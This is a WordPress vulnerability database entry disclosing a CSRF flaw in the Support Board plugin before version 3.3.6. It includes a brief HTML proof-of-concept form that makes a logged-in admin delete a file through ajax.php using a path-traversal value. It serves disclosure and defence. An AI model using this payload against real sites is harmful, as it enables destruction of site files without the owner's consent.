WordPress Plugin Vulnerabilities
Support Board < 3.3.6 - Arbitrary File Deletion via CSRF
Description
The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files
Proof of Concept
<html> <body> <form action="https://example.com/wp-content/plugins/supportboard/supportboard/include/ajax.php" method="POST"> <input type="hidden" name="function" value="delete-file" /> <input type="hidden" name="path" value="/../yolo.php" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-18 (about 2 years ago)
Added
2022-01-26 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)